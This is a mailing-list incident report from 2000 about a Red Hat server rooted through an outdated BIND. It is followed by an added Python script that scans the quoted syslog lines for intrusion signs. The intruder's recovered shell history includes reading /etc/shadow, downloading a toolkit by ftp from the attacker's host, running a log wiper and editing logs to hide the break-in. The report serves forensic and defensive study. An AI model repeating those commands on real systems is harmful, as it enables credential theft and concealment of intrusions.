Subject: rooted by r0x - from address 212.177.241.127
From: Dwight Schauer (dschauer VCSD.COM)
Date: Wed Mar 29 2000 - 06:50:59 CST
- Next message: Christoph Schneeberger: "Re: Dramatic increase in UDP Port 137 (NetBIOS Name Service) probeactivity"
- Previous message: Bill Pennington: "Re: Dramatic increase in UDP Port 137 (NetBIOS Name Service)probeactivity"
- In reply to: Ed Padin: "Re: 8 hours of pinging"
- Next in thread: Ryan Russell: "Re: rooted by r0x - from address 212.177.241.127"
- Next in thread: Robert Kulagowski: "Re: 8 hours of pinging"
- Next in thread: Ed Padin: "Re: 8 hours of pinging"
- Next in thread: Mike A. Harris: "Re: 8 hours of pinging"
- Reply: Dwight Schauer: "rooted by r0x - from address 212.177.241.127"
- Reply: Ryan Russell: "Re: rooted by r0x - from address 212.177.241.127"
- Reply: Ethan King: "Re: rooted by r0x - from address 212.177.241.127"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
A machine that I am responsible for was rooted sometime between 12:04 and 12:06
CST on Mar 28, 2000.
The machine had just had RedHat 6.1 installed and not all the updates were on
it.
I believe the intruder got in through bind (the version that was running at
the time has known exploits, I know).
Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127
Mar 28 12:04:45 7of9 sshd[15116]: refused connect from 212.177.241.127
Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127
Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127
Mar 28 12:06:38 7of9 in.telnetd[15128]: connect from 212.177.241.127
From my named/bind default directory:
drwxr-xr-x 2 root root 1024 Mar 28 12:05 ADMROCKS
That directory was not placed there by me.
The version of bind running on the machine was bind-8.2.1-7
(It had bind-8.2.2_P3-1 before 6.1 was reinstalled on it, that update was
somehow overlooked)
Mar 28 12:06:54 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
Mar 28 12:06:54 7of9 PAM_pwdb[15129]: (login) session opened for user r0x by (uid=0)
Mar 28 12:09:08 7of9 sshd[15158]: Did not receive ident string from 212.177.241.127.
Mar 28 12:12:43 7of9 in.telnetd[15173]: connect from 212.177.241.127
Mar 28 12:12:59 7of9 login: LOGIN ON 3 BY r0x FROM 212.177.241.127
Mar 28 12:12:59 7of9 PAM_pwdb[15174]: (login) session opened for user r0x by (uid=0)
Mar 28 12:14:31 7of9 in.telnetd[15192]: connect from 212.177.241.127
Mar 28 12:14:43 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
Mar 28 12:14:43 7of9 PAM_pwdb[15193]: (login) session opened for user r0x by (uid=0)
The cracker ran some things out of /tmp and then moved on to /usr/doc/gd-1.3/
There the cracker created a directory called FAQ and dumped his payload/toolkits
in there.
An attempt was made to edit the logs, but they had already been emailed
elsewhere by logcheck.
Pico was used to edit the logs, and pico saved a backup copy, or so it appears.
This is the .bash_history from /tmp:
cd /usr
cd doc
ls
cd gd-1.3
ls
mkdir FAQ
cd FAQ
ls
pwd
cat /etc/shadow
ps uxa | grep sshd
ls
ftp 212.177.241.127
ls
tar xvfz a.tar.gz
pico ulogin.c
pico ulogin.c
cd /usr/doc/gd-1.3/FAQ
chmod +x Uaz
./UAz
./Uaz
ls
ps uxa | grep suid
kill 15189
ls
ls
ls
ls
ftp updates.redhat.com
ls
cd bin
ls
./zap2 r0x
./zap2 r0x
./zap2 r0x
dddddddddddddd
exit
The ftp to updates.redhat.com was interesting, maybe he was going to upgrade
bind for me ;-)
This is the .bash_history from root's account (in ~root) (with the history from
prior to the attack removed):
w
w
w
w
pico /etc/passwd
pico /etc/passwd
passwd games
cd /tmp
cp /var/log/messages ./
/usr/sbin/named
mv messages /var/log
pico /var/log/messages
pico /var/log/secure
pico /var/log/secure
pico /var/log/secure
The w's could have been me. Everything prior to the w's was most definitely me.
The last root access I had to the machine was on the 27th of March. (Until after
the attack)
Like I said, I believe the compromise was through bind. If anyone thinks
otherwise, let me know.
If anyone wants them, I can give them the full log and history files, and the
full payload that was dumped on me by the cracker.
-- Dwight Schauer <dschauervcsd.com>
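The report shows the pattern a log reviewer wants to catch: a burst of tcp_wrappers refusals from one address across several services, followed minutes later by successful logins as an account the administrator never created. The script below is an added example (not part of the original post, not a Neohapsis or logcheck tool) that parses the syslog lines quoted above and raises exactly those alerts. It assumes the syslog year is 2000 (syslog omits the year) and uses a constructed list of accounts the administrator actually created; both are labelled in the code.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Syslog lines copied from the incident report (mail line wraps joined).
SAMPLE_LOG = """\
Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127
Mar 28 12:04:45 7of9 sshd[15116]: refused connect from 212.177.241.127
Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127
Mar 28 12:06:38 7of9 in.telnetd[15128]: connect from 212.177.241.127
Mar 28 12:06:54 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
Mar 28 12:06:54 7of9 PAM_pwdb[15129]: (login) session opened for user r0x by (uid=0)
Mar 28 12:09:08 7of9 sshd[15158]: Did not receive ident string from 212.177.241.127.
Mar 28 12:12:43 7of9 in.telnetd[15173]: connect from 212.177.241.127
Mar 28 12:12:59 7of9 login: LOGIN ON 3 BY r0x FROM 212.177.241.127
Mar 28 12:14:31 7of9 in.telnetd[15192]: connect from 212.177.241.127
Mar 28 12:14:43 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
"""

# Constructed list of accounts the administrator created on the box;
# "r0x" is deliberately not among them.
KNOWN_ACCOUNTS = {"root", "dschauer", "games"}

# Classic syslog: "Mon DD HH:MM:SS host prog[pid]: message" (pid optional).
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\[: ]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
REFUSED_RE = re.compile(r"^refused connect from (?P<ip>[\d.]+)")
CONNECT_RE = re.compile(r"^connect from (?P<ip>[\d.]+)")
LOGIN_RE = re.compile(r"^LOGIN ON (?P<tty>\S+) BY (?P<user>\S+) FROM (?P<ip>[\d.]+)")


def parse_events(log_text, year=2000):
    """Turn syslog text into (time, kind, fields) tuples for the three event
    types we care about: tcp_wrappers refusals, accepted connects, and logins.
    Syslog lines carry no year, so the caller supplies it (assumed 2000 here).
    """
    events = []
    for line in log_text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        prog, msg = m["prog"], m["msg"]
        if (r := REFUSED_RE.match(msg)):          # check "refused" before plain "connect"
            events.append((ts, "refused", {"ip": r["ip"], "service": prog}))
        elif (c := CONNECT_RE.match(msg)):
            events.append((ts, "connect", {"ip": c["ip"], "service": prog}))
        elif (lg := LOGIN_RE.match(msg)):
            events.append((ts, "login", {"ip": lg["ip"], "user": lg["user"], "tty": lg["tty"]}))
    return events


def analyze(log_text, known_accounts, window=timedelta(minutes=10), year=2000):
    """Summarise activity per source address and flag what a defender wants to see:
    logins by accounts nobody created, logins from an address that tcp_wrappers
    had just refused, and one address sweeping several services."""
    events = parse_events(log_text, year)
    per_ip = defaultdict(lambda: {"refused": 0, "refused_services": set(),
                                  "connects": 0, "logins": []})
    alerts = []
    for ts, kind, f in events:
        rec = per_ip[f["ip"]]
        if kind == "refused":
            rec["refused"] += 1
            rec["refused_services"].add(f["service"])
        elif kind == "connect":
            rec["connects"] += 1
        elif kind == "login":
            rec["logins"].append((ts, f["user"], f["tty"]))
            if f["user"] not in known_accounts:
                alerts.append(f"{ts}: login by unknown account {f['user']!r} from {f['ip']}")
            # A refusal burst shortly before a successful login is the classic
            # "probe, then exploit something else, then walk in" sequence.
            recent = [e for e in events
                      if e[1] == "refused" and e[2]["ip"] == f["ip"]
                      and ts - window <= e[0] <= ts]
            if recent:
                alerts.append(f"{ts}: {f['ip']} logged in as {f['user']} within "
                              f"{window} of {len(recent)} tcp_wrappers refusals")
    for ip, rec in per_ip.items():
        if len(rec["refused_services"]) >= 3:
            alerts.append(f"{ip} was refused by {len(rec['refused_services'])} "
                          f"different services (service sweep)")
    return {"per_ip": dict(per_ip), "alerts": alerts}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG, KNOWN_ACCOUNTS)
    for ip, rec in result["per_ip"].items():
        print(f"{ip}: {rec['refused']} refused, {rec['connects']} connects, "
              f"{len(rec['logins'])} logins as {sorted({u for _, u, _ in rec['logins']})}")
    for a in result["alerts"]:
        print("ALERT", a)
```

Run against the quoted lines, the per-address summary shows 5 refusals across 4 services, 3 accepted telnet connects and 3 logins, all as r0x; every login trips both the unknown-account and the refused-then-logged-in checks. The point of the author's logcheck setup is that this analysis only works on a copy of the logs that the intruder could not reach with pico, so feed the script the mailed or remotely syslogged copy, not /var/log on the compromised host.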